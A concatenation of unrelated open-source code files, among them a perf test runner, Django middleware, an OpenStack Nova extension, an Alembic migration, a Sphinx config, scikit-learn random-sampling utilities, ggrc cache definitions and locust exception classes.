def load_events(self, path, events):
parser_event = ConfigParser.SafeConfigParser()
parser_event.read(path)
        # The event record section header contains the word 'event',
        # optionally followed by ':' which allows a 'parent
        # event' to be loaded first as a base
for section in filter(self.is_event, parser_event.sections()):
parser_items = parser_event.items(section);
base_items = {}
# Read parent event if there's any
if (':' in section):
base = section[section.index(':') + 1:]
parser_base = ConfigParser.SafeConfigParser()
parser_base.read(self.test_dir + '/' + base)
base_items = parser_base.items('event')
e = Event(section, parser_items, base_items)
events[section] = e
def run_cmd(self, tempdir):
cmd = "PERF_TEST_ATTR=%s %s %s -o %s/perf.data %s" % (tempdir,
self.perf, self.command, tempdir, self.args)
ret = os.WEXITSTATUS(os.system(cmd))
log.info(" '%s' ret %d " % (cmd, ret))
if ret != int(self.ret):
raise Unsup(self)
def compare(self, expect, result):
match = {}
log.debug(" compare");
        # For each expected event find all matching
        # events in the result. Fail if there are none.
for exp_name, exp_event in expect.items():
exp_list = []
log.debug(" matching [%s]" % exp_name)
for res_name, res_event in result.items():
log.debug(" to [%s]" % res_name)
if (exp_event.equal(res_event)):
exp_list.append(res_name)
log.debug(" ->OK")
else:
log.debug(" ->FAIL");
log.debug(" match: [%s] matches %s" % (exp_name, str(exp_list)))
            # we did not find any matching event - fail
if (not exp_list):
exp_event.diff(res_event)
raise Fail(self, 'match failure');
match[exp_name] = exp_list
# For each defined group in the expected events
# check we match the same group in the result.
for exp_name, exp_event in expect.items():
group = exp_event.group
if (group == ''):
continue
for res_name in match[exp_name]:
res_group = result[res_name].group
if res_group not in match[group]:
raise Fail(self, 'group failure')
log.debug(" group: [%s] matches group leader %s" %
(exp_name, str(match[group])))
log.debug(" matched")
def resolve_groups(self, events):
for name, event in events.items():
group_fd = event['group_fd'];
if group_fd == '-1':
continue;
for iname, ievent in events.items():
if (ievent['fd'] == group_fd):
event.group = iname
log.debug('[%s] has group leader [%s]' % (name, iname))
break;
def run(self):
tempdir = tempfile.mkdtemp();
try:
# run the test script
self.run_cmd(tempdir);
# load events expectation for the test
log.debug(" loading result events");
for f in glob.glob(tempdir + '/event*'):
self.load_events(f, self.result);
# resolve group_fd to event names
self.resolve_groups(self.expect);
self.resolve_groups(self.result);
# do the expectation - results matching - both ways
self.compare(self.expect, self.result)
self.compare(self.result, self.expect)
finally:
# cleanup
shutil.rmtree(tempdir)
def run_tests(options):
for f in glob.glob(options.test_dir + '/' + options.test):
try:
Test(f, options).run()
except Unsup, obj:
log.warning("unsupp %s" % obj.getMsg())
def setup_log(verbose):
global log
level = logging.CRITICAL
if verbose == 1:
level = logging.WARNING
if verbose == 2:
level = logging.INFO
if verbose >= 3:
level = logging.DEBUG
log = logging.getLogger('test')
log.setLevel(level)
ch = logging.StreamHandler()
ch.setLevel(level)
formatter = logging.Formatter('%(message)s')
ch.setFormatter(formatter)
log.addHandler(ch)
USAGE = '''%s [OPTIONS]
-d dir # tests dir
-p path # perf binary
-t test # single test
-v # verbose level
''' % sys.argv[0]
def main():
parser = optparse.OptionParser(usage=USAGE)
parser.add_option("-t", "--test",
action="store", type="string", dest="test")
parser.add_option("-d", "--test-dir",
action="store", type="string", dest="test_dir")
parser.add_option("-p", "--perf",
action="store", type="string", dest="perf")
parser.add_option("-v", "--verbose",
action="count", dest="verbose")
options, args = parser.parse_args()
if args:
parser.error('FAILED wrong arguments %s' % ' '.join(args))
return -1
setup_log(options.verbose)
if not options.test_dir:
print 'FAILED no -d option specified'
sys.exit(-1)
if not options.test:
options.test = 'test*'
try:
run_tests(options)
except Fail, obj:
print "FAILED %s" % obj.getMsg();
sys.exit(-1)
sys.exit(0)
if __name__ == '__main__':
main()
|
JanMalte/secondhandshop_server | refs/heads/master | src/shs_auth/middleware.py | 1 | """
Second-Hand-Shop Project
@author: Malte Gerth
@copyright: Copyright (C) 2015 Malte Gerth
@license: MIT
@maintainer: Malte Gerth
@email: mail@malte-gerth.de
"""
import pytz
from django.shortcuts import redirect
from django.utils import timezone
from events.models import get_active_event
from shs_auth.models import MemberStatus
__author__ = "Malte Gerth <mail@malte-gerth.de>"
__copyright__ = "Copyright (C) 2015 Malte Gerth"
__license__ = "MIT"
class TimezoneMiddleware(object):
def process_request(self, request):
if hasattr(request, "user"):
tzname = getattr(request.user, "timezone", None)
else:
tzname = "Europe/Berlin"
if tzname:
timezone.activate(pytz.timezone(tzname))
else:
timezone.deactivate()
class MemberStatusMiddleware(object):
def process_request(self, request):
if request.user.is_anonymous():
return None
if request.user.is_superuser:
return None
if not MemberStatus.objects.filter(
user=request.user, event=get_active_event()
).exists():
from django.core.urlresolvers import resolve
current_url = resolve(request.path_info).url_name
if current_url != "update_member_status":
return redirect("shs_auth:update_member_status")
|
TieWei/nova | refs/heads/enhanced/havana | nova/api/openstack/compute/plugins/v3/extended_availability_zone.py | 15 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 Netease, LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The Extended Availability Zone Status API extension."""
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova import availability_zones as avail_zone
ALIAS = "os-extended-availability-zone"
authorize = extensions.soft_extension_authorizer('compute',
'v3:' + ALIAS)
class ExtendedAZController(wsgi.Controller):
def _extend_server(self, context, server, instance):
key = "%s:availability_zone" % ExtendedAvailabilityZone.alias
az = avail_zone.get_instance_availability_zone(context, instance)
if not az and instance.get('availability_zone'):
# Likely hasn't reached a viable compute node yet so give back the
# desired availability_zone that *may* exist in the instance
# record itself.
az = instance['availability_zone']
server[key] = az
@wsgi.extends
def show(self, req, resp_obj, id):
context = req.environ['nova.context']
if authorize(context):
resp_obj.attach(xml=ExtendedAZTemplate())
server = resp_obj.obj['server']
db_instance = req.get_db_instance(server['id'])
self._extend_server(context, server, db_instance)
@wsgi.extends
def detail(self, req, resp_obj):
context = req.environ['nova.context']
if authorize(context):
resp_obj.attach(xml=ExtendedAZsTemplate())
servers = list(resp_obj.obj['servers'])
for server in servers:
db_instance = req.get_db_instance(server['id'])
self._extend_server(context, server, db_instance)
class ExtendedAvailabilityZone(extensions.V3APIExtensionBase):
"""Extended Server Attributes support."""
name = "ExtendedAvailabilityZone"
alias = ALIAS
namespace = ("http://docs.openstack.org/compute/ext/"
"extended_availability_zone/api/v3")
version = 1
def get_controller_extensions(self):
controller = ExtendedAZController()
extension = extensions.ControllerExtension(self, 'servers', controller)
return [extension]
def get_resources(self):
return []
def make_server(elem):
elem.set('{%s}availability_zone' % ExtendedAvailabilityZone.namespace,
'%s:availability_zone' % ExtendedAvailabilityZone.alias)
class ExtendedAZTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('server', selector='server')
make_server(root)
alias = ExtendedAvailabilityZone.alias
namespace = ExtendedAvailabilityZone.namespace
return xmlutil.SlaveTemplate(root, 1, nsmap={alias: namespace})
class ExtendedAZsTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('servers')
elem = xmlutil.SubTemplateElement(root, 'server', selector='servers')
make_server(elem)
alias = ExtendedAvailabilityZone.alias
namespace = ExtendedAvailabilityZone.namespace
return xmlutil.SlaveTemplate(root, 1, nsmap={alias: namespace})
|
Insality/argalactic | refs/heads/master | argalactic.py | 1 | # coding: utf-8
__author__ = 'Insality'
from scenes.menu import *
import pyglet
import config
def main():
print("Hello, Argalactic!")
director.init(resizable=True, caption=config.GAME_TITLE, width=config.GAME_WIDTH, height=config.GAME_HEIGHT)
director.window.set_icon(pyglet.image.load('res/icon.png'))
director.window.set_location(300, 0)
menu_scene = Menu()
director.run (menu_scene)
if __name__ == '__main__':
main() |
alphagov/digitalmarketplace-api | refs/heads/dependabot/pip/digitalmarketplace-apiclient-22.2.0 | migrations/versions/840_add_application_close_date_for_framework.py | 1 | """Add `application_close_date` for Framework
Revision ID: 840
Revises: 830
Create Date: 2017-02-06 11:09:26.852142
"""
from alembic import op
from datetime import datetime
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '840'
down_revision = '830'
frameworks_table = sa.table(
'frameworks',
sa.Column('id', sa.Integer, primary_key=True),
sa.Column('slug', sa.String, nullable=False, unique=True, index=True),
sa.Column('allow_declaration_reuse', sa.Boolean),
sa.Column('application_close_date', sa.DateTime)
)
def upgrade():
op.add_column('frameworks', sa.Column('application_close_date', sa.DateTime(), nullable=True))
op.add_column(
'frameworks',
sa.Column('allow_declaration_reuse', sa.Boolean(), nullable=False, server_default='false')
)
fields = ('slug', 'application_close_date', 'allow_declaration_reuse')
new_values = (
('digital-outcomes-and-specialists', datetime(2016, 1, 1, 15), True),
('digital-outcomes-and-specialists-2', datetime(2017, 1, 16, 17), True),
('g-cloud-8', datetime(2016, 6, 1, 17), True),
)
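    # Zip each tuple with `fields`, turning it into update kwargs keyed off the
    # popped 'slug', e.g. {'application_close_date': datetime(2016, 6, 1, 17),
    # 'allow_declaration_reuse': True}.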
new_values = [dict(zip(fields, i)) for i in new_values]
for i in new_values:
op.execute(
frameworks_table.update().where(frameworks_table.c.slug==i.pop('slug')).values(**i)
)
def downgrade():
op.drop_column('frameworks', 'allow_declaration_reuse')
op.drop_column('frameworks', 'application_close_date')
|
captainsafia/agate | refs/heads/master | docs/conf.py | 1 | # -*- coding: utf-8 -*-
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.intersphinx']
autodoc_member_order = 'bysource'
intersphinx_mapping = {
'python': ('http://docs.python.org/2.7', None)
}
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'agate'
copyright = u'2015, Christopher Groskopf'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.7.0'
# The full version, including alpha/beta/rc tags.
release = '0.7.0 (alpha)'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd: # only import and set the theme if we're building docs locally
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'agatedoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'agate.tex', u'agate Documentation',
u'Christopher Groskopf', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
]
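# An illustrative man page entry, kept commented out; the output name and
# section number below are placeholders, not project decisions:
#man_pages = [
#    ('index', 'agate', u'agate Documentation',
#     [u'Christopher Groskopf'], 1),
#]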
|
LubyRuffy/spiderfoot | refs/heads/master | ext/stem/util/__init__.py | 13 | # Copyright 2011-2015, Damian Johnson and The Tor Project
# See LICENSE for licensing information
"""
Utility functions used by the stem library.
"""
__all__ = [
'conf',
'connection',
'enum',
'log',
'lru_cache',
'ordereddict',
'proc',
'system',
'term',
'test_tools',
'tor_tools',
]
|
rexshihaoren/scikit-learn | refs/heads/master | sklearn/utils/random.py | 234 | # Author: Hamzeh Alsalhi <ha258@cornell.edu>
#
# License: BSD 3 clause
from __future__ import division
import numpy as np
import scipy.sparse as sp
import operator
import array
from sklearn.utils import check_random_state
from sklearn.utils.fixes import astype
from ._random import sample_without_replacement
__all__ = ['sample_without_replacement', 'choice']
# This is a backport of np.random.choice from numpy 1.7
# The function can be removed when we bump the requirements to >=1.7
def choice(a, size=None, replace=True, p=None, random_state=None):
"""
choice(a, size=None, replace=True, p=None)
Generates a random sample from a given 1-D array
.. versionadded:: 1.7.0
Parameters
-----------
a : 1-D array-like or int
If an ndarray, a random sample is generated from its elements.
If an int, the random sample is generated as if a was np.arange(n)
size : int or tuple of ints, optional
Output shape. Default is None, in which case a single value is
returned.
replace : boolean, optional
Whether the sample is with or without replacement.
p : 1-D array-like, optional
The probabilities associated with each entry in a.
        If not given the sample assumes a uniform distribution over all
entries in a.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
Returns
--------
samples : 1-D ndarray, shape (size,)
The generated random samples
Raises
-------
ValueError
If a is an int and less than zero, if a or p are not 1-dimensional,
if a is an array-like of size 0, if p is not a vector of
probabilities, if a and p have different lengths, or if
replace=False and the sample size is greater than the population
size
See Also
---------
randint, shuffle, permutation
Examples
---------
Generate a uniform random sample from np.arange(5) of size 3:
>>> np.random.choice(5, 3) # doctest: +SKIP
array([0, 3, 4])
>>> #This is equivalent to np.random.randint(0,5,3)
Generate a non-uniform random sample from np.arange(5) of size 3:
>>> np.random.choice(5, 3, p=[0.1, 0, 0.3, 0.6, 0]) # doctest: +SKIP
array([3, 3, 0])
Generate a uniform random sample from np.arange(5) of size 3 without
replacement:
>>> np.random.choice(5, 3, replace=False) # doctest: +SKIP
array([3,1,0])
>>> #This is equivalent to np.random.shuffle(np.arange(5))[:3]
Generate a non-uniform random sample from np.arange(5) of size
3 without replacement:
>>> np.random.choice(5, 3, replace=False, p=[0.1, 0, 0.3, 0.6, 0])
... # doctest: +SKIP
array([2, 3, 0])
Any of the above can be repeated with an arbitrary array-like
instead of just integers. For instance:
>>> aa_milne_arr = ['pooh', 'rabbit', 'piglet', 'Christopher']
>>> np.random.choice(aa_milne_arr, 5, p=[0.5, 0.1, 0.1, 0.3])
... # doctest: +SKIP
array(['pooh', 'pooh', 'pooh', 'Christopher', 'piglet'],
dtype='|S11')
"""
random_state = check_random_state(random_state)
# Format and Verify input
a = np.array(a, copy=False)
if a.ndim == 0:
try:
# __index__ must return an integer by python rules.
pop_size = operator.index(a.item())
except TypeError:
raise ValueError("a must be 1-dimensional or an integer")
if pop_size <= 0:
raise ValueError("a must be greater than 0")
elif a.ndim != 1:
raise ValueError("a must be 1-dimensional")
else:
pop_size = a.shape[0]
        if pop_size == 0:
raise ValueError("a must be non-empty")
    if p is not None:
p = np.array(p, dtype=np.double, ndmin=1, copy=False)
if p.ndim != 1:
raise ValueError("p must be 1-dimensional")
if p.size != pop_size:
raise ValueError("a and p must have same size")
if np.any(p < 0):
raise ValueError("probabilities are not non-negative")
if not np.allclose(p.sum(), 1):
raise ValueError("probabilities do not sum to 1")
shape = size
if shape is not None:
size = np.prod(shape, dtype=np.intp)
else:
size = 1
# Actual sampling
if replace:
        if p is not None:
cdf = p.cumsum()
cdf /= cdf[-1]
uniform_samples = random_state.random_sample(shape)
idx = cdf.searchsorted(uniform_samples, side='right')
# searchsorted returns a scalar
idx = np.array(idx, copy=False)
else:
idx = random_state.randint(0, pop_size, size=shape)
else:
if size > pop_size:
raise ValueError("Cannot take a larger sample than "
"population when 'replace=False'")
        if p is not None:
if np.sum(p > 0) < size:
raise ValueError("Fewer non-zero entries in p than size")
n_uniq = 0
p = p.copy()
            found = np.zeros(shape, dtype=int)
flat_found = found.ravel()
while n_uniq < size:
x = random_state.rand(size - n_uniq)
if n_uniq > 0:
p[flat_found[0:n_uniq]] = 0
cdf = np.cumsum(p)
cdf /= cdf[-1]
new = cdf.searchsorted(x, side='right')
_, unique_indices = np.unique(new, return_index=True)
unique_indices.sort()
new = new.take(unique_indices)
flat_found[n_uniq:n_uniq + new.size] = new
n_uniq += new.size
idx = found
else:
idx = random_state.permutation(pop_size)[:size]
if shape is not None:
idx.shape = shape
if shape is None and isinstance(idx, np.ndarray):
# In most cases a scalar will have been made an array
idx = idx.item(0)
# Use samples as indices for a if a is array-like
if a.ndim == 0:
return idx
if shape is not None and idx.ndim == 0:
# If size == () then the user requested a 0-d array as opposed to
# a scalar object when size is None. However a[idx] is always a
# scalar and not an array. So this makes sure the result is an
# array, taking into account that np.array(item) may not work
# for object arrays.
res = np.empty((), dtype=a.dtype)
res[()] = a[idx]
return res
return a[idx]
def random_choice_csc(n_samples, classes, class_probability=None,
random_state=None):
"""Generate a sparse random matrix given column class distributions
Parameters
----------
n_samples : int,
Number of samples to draw in each column.
classes : list of size n_outputs of arrays of size (n_classes,)
List of classes for each column.
class_probability : list of size n_outputs of arrays of size (n_classes,)
Optional (default=None). Class distribution of each column. If None the
uniform distribution is assumed.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
Returns
-------
random_matrix : sparse csc matrix of size (n_samples, n_outputs)
"""
data = array.array('i')
indices = array.array('i')
indptr = array.array('i', [0])
for j in range(len(classes)):
classes[j] = np.asarray(classes[j])
if classes[j].dtype.kind != 'i':
raise ValueError("class dtype %s is not supported" %
classes[j].dtype)
classes[j] = astype(classes[j], np.int64, copy=False)
# use uniform distribution if no class_probability is given
if class_probability is None:
class_prob_j = np.empty(shape=classes[j].shape[0])
class_prob_j.fill(1 / classes[j].shape[0])
else:
class_prob_j = np.asarray(class_probability[j])
        if not np.isclose(np.sum(class_prob_j), 1.0):
raise ValueError("Probability array at index {0} does not sum to "
"one".format(j))
if class_prob_j.shape[0] != classes[j].shape[0]:
raise ValueError("classes[{0}] (length {1}) and "
"class_probability[{0}] (length {2}) have "
"different length.".format(j,
classes[j].shape[0],
class_prob_j.shape[0]))
# If 0 is not present in the classes insert it with a probability 0.0
if 0 not in classes[j]:
classes[j] = np.insert(classes[j], 0, 0)
class_prob_j = np.insert(class_prob_j, 0, 0.0)
# If there are nonzero classes choose randomly using class_probability
rng = check_random_state(random_state)
if classes[j].shape[0] > 1:
p_nonzero = 1 - class_prob_j[classes[j] == 0]
nnz = int(n_samples * p_nonzero)
ind_sample = sample_without_replacement(n_population=n_samples,
n_samples=nnz,
random_state=random_state)
indices.extend(ind_sample)
            # Normalize probabilities for the nonzero elements
classes_j_nonzero = classes[j] != 0
class_probability_nz = class_prob_j[classes_j_nonzero]
class_probability_nz_norm = (class_probability_nz /
np.sum(class_probability_nz))
classes_ind = np.searchsorted(class_probability_nz_norm.cumsum(),
rng.rand(nnz))
data.extend(classes[j][classes_j_nonzero][classes_ind])
indptr.append(len(indices))
return sp.csc_matrix((data, indices, indptr),
(n_samples, len(classes)),
dtype=int)
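# A minimal usage sketch for the two helpers above; the class arrays and
# probabilities are illustrative values. Guarded so that importing this
# module is unaffected.
if __name__ == '__main__':
    # Weighted sampling with the backported choice().
    draws = choice(5, size=3, p=[0.1, 0.0, 0.3, 0.6, 0.0], random_state=0)
    print(draws)  # three indices drawn from {0, 2, 3}
    # Sparse column-wise class sampling: column 0 is binary, column 1
    # draws from {0, 2, 3} with the given probabilities.
    matrix = random_choice_csc(
        n_samples=5,
        classes=[np.array([0, 1]), np.array([0, 2, 3])],
        class_probability=[np.array([0.5, 0.5]),
                           np.array([0.2, 0.3, 0.5])],
        random_state=0)
    print(matrix.toarray())  # dense view of the (5, 2) integer matrix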
|
edofic/ggrc-core | refs/heads/develop | src/ggrc/cache/cache.py | 3 | # Copyright (C) 2016 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
from collections import namedtuple
CacheEntry = namedtuple('CacheEntry', 'model_plural class_name cache_type')
MappingEntry = namedtuple('MappingEntry', 'class_name attr polymorph')
def resource(model_plural, class_name, cache_type='memcache'):
return CacheEntry(model_plural, class_name, cache_type)
def mapping(class_name, attr, polymorph=False):
return MappingEntry(class_name, attr, polymorph)
def all_cache_entries():
ret = [
resource('access_groups', 'AccessGroup'),
resource('audits', 'Audit'),
resource('custom_attribute_values', 'CustomAttributeValue'),
resource('categorizations', 'Categorization'),
resource('category_bases', 'CategoryBase'),
resource('comments', 'Comment'),
resource('control_categories', 'ControlCategory'),
resource('control_assertions', 'ControlAssertion'),
resource('contexts', 'Context'),
resource('controls', 'Control'),
      resource('assessments', 'Assessment'),
resource('assessment_templates', 'AssessmentTemplate'),
resource('data_assets', 'DataAsset'),
resource('directives', 'Directive'),
resource('contracts', 'Contract'),
resource('policies', 'Policy'),
resource('regulations', 'Regulation'),
resource('standards', 'Standard'),
resource('documents', 'Document'),
resource('events', 'Event'),
resource('facilities', 'Facility'),
resource('helps', 'Help'),
resource('markets', 'Market'),
resource('meetings', 'Meeting'),
resource('object_documents', 'ObjectDocument'),
resource('object_owners', 'ObjectOwner'),
resource('object_people', 'ObjectPerson'),
resource('objectives', 'Objective'),
resource('options', 'Option'),
resource('org_groups', 'OrgGroup'),
resource('vendors', 'Vendor'),
resource('people', 'Person'),
resource('products', 'Product'),
resource('projects', 'Project'),
resource('programs', 'Program'),
resource('relationships', 'Relationship'),
resource('requests', 'Request'),
resource('revisions', 'Revision'),
resource('sections', 'Section'),
resource('clauses', 'Clause'),
resource('systems_or_processes', 'SystemOrProcess'),
resource('systems', 'System'),
resource('processes', 'Process'),
resource('issues', 'Issue'),
# ggrc notification models
resource('notification_configs', 'NotificationConfig'),
resource('notifications', 'Notification'),
resource('notification_type', 'NotificationType'),
      # ggrc custom attributes
resource('custom_attribute_definitions', 'CustomAttributeDefinition'),
resource('custom_attribute_values', 'CustomAttributeValue'),
# FIXME: Extension-defined models should be registered
# from the extensions.
# ggrc_basic_permissions models
resource('roles', 'Role'),
resource('user_roles', 'UserRole'),
# ggrc_gdrive_integration models
resource('object_folders', 'ObjectFolder'),
resource('object_files', 'ObjectFile'),
resource('object_events', 'ObjectEvent'),
# ggrc_risk_assessments models
resource('templates', 'Template'),
resource('risk_assessments', 'RiskAssessment'),
resource('risk_assessment_mappings', 'RiskAssessmentMapping'),
resource('risk_assessment_control_mappings',
'RiskAssessmentControlMapping'),
resource('threats', 'Threat'),
resource('vulnerabilities', 'Vulnerability'),
# ggrc_workflows models
resource('cycle_task_entries', 'CycleTaskEntry'),
resource('cycle_task_group_object_tasks', 'CycleTaskGroupObjectTask'),
resource('cycle_task_groups', 'CycleTaskGroup'),
resource('cycles', 'Cycle'),
resource('task_group_objects', 'TaskGroupObject'),
resource('task_group_tasks', 'TaskGroupTask'),
resource('task_groups', 'TaskGroup'),
resource('workflow_people', 'WorkflowPerson'),
resource('workflows', 'Workflow'),
]
return ret
def all_mapping_entries():
ret = [
mapping('Audit', 'requests'),
mapping('Audit', 'program'),
mapping('Request', 'audit'),
mapping('CustomAttributeValue', 'attributable', True),
mapping('Request', 'responses'),
mapping('ObjectDocument', 'document'),
mapping('ObjectDocument', 'documentable', True),
mapping('ObjectOwner', 'person'),
mapping('ObjectOwner', 'ownable', True),
mapping('ObjectPerson', 'person'),
mapping('ObjectPerson', 'personable', True),
mapping('Section', 'directive'), # this goes out?
mapping('Relationship', 'source', True),
mapping('Relationship', 'destination', True),
mapping('UserRole', 'context'),
mapping('UserRole', 'person'),
mapping('UserRole', 'role'),
mapping('ObjectEvent', 'eventable', True),
mapping('ObjectFolder', 'folderable', True),
mapping('ObjectFile', 'fileable', True),
mapping('Notification', 'recipients'),
mapping('Notification', 'notification_object'),
# ggrc_workflows mappings:
mapping('TaskGroupObject', 'object', True),
mapping('TaskGroupObject', 'task_group'),
mapping('TaskGroupTask', 'task_group'),
mapping('TaskGroup', 'workflow'),
mapping('WorkflowPerson', 'context'),
mapping('WorkflowPerson', 'person'),
mapping('WorkflowPerson', 'workflow'),
mapping('Cycle', 'workflow'),
mapping('Cycle', 'cycle_task_groups'),
mapping('CycleTaskGroup', 'cycle'),
mapping('CycleTaskGroup', 'task_group'),
mapping('CycleTaskGroupObjectTask', 'cycle'),
mapping('CycleTaskGroupObjectTask', 'cycle_task_entries'),
mapping('CycleTaskGroupObjectTask', 'task_group_task'),
mapping('CycleTaskGroupObjectTask', 'cycle_task_objects_for_cache'),
mapping('CycleTaskEntry', 'cycle'),
mapping('CycleTaskEntry', 'cycle_task_group_object_task'),
# mapping('RiskAssessmentMapping'),
# mapping('RiskAssessmentControlMapping'),
]
return ret
class Cache:
name = None
supported_resources = {}
def __init__(self):
pass
def get_name(self):
return None
def get(self, *_):
return None
def add(self, *_):
return None
def update(self, *_):
return None
def remove(self, *_):
return None
def get_multi(self, *_):
return None
def add_multi(self, *_):
return None
def update_multi(self, *_):
return None
def remove_multi(self, *_):
return None
def clean(self):
return False
def get_key(self, category, resource):
cache_key = category + ":" + resource
return cache_key
def parse_filter(self, filter):
return filter.get('ids'), filter.get('attrs')
def is_caching_supported(self, category, resource):
    if category == 'collection':
return resource in self.supported_resources
else:
return False
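# A minimal sketch of how a concrete subclass would be addressed; the
# 'controls' resource name is illustrative. Keys follow the
# "<category>:<resource>" scheme used by get_key above.
if __name__ == '__main__':
  cache = Cache()
  print(cache.get_key('collection', 'controls'))  # collection:controls
  # False here: the base class declares no supported_resources.
  print(cache.is_caching_supported('collection', 'controls'))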
|
yangchaogit/locust | refs/heads/master | locust/exception.py | 45 | class LocustError(Exception):
pass
class ResponseError(Exception):
pass
class CatchResponseError(Exception):
pass
class InterruptTaskSet(Exception):
"""
Exception that will interrupt a Locust when thrown inside a task
"""
def __init__(self, reschedule=True):
"""
If *reschedule* is True and the InterruptTaskSet is raised inside a nested TaskSet,
        the parent TaskSet would immediately reschedule another task.
"""
self.reschedule = reschedule
class StopLocust(Exception):
pass
class RescheduleTask(Exception):
"""
    When raised in a task, it's equivalent to a return statement.
Used internally by TaskSet. When raised within the task control flow of a TaskSet,
but not inside a task, the execution should be handed over to the parent TaskSet.
"""
class RescheduleTaskImmediately(Exception):
"""
When raised in a Locust task, another locust task will be rescheduled immediately
"""
|
GNOME/orca | refs/heads/master | src/orca/braille_generator.py | 1 | # Orca
#
# Copyright 2005-2009 Sun Microsystems Inc.
#
# This library is free software; you can redistribute it and/or
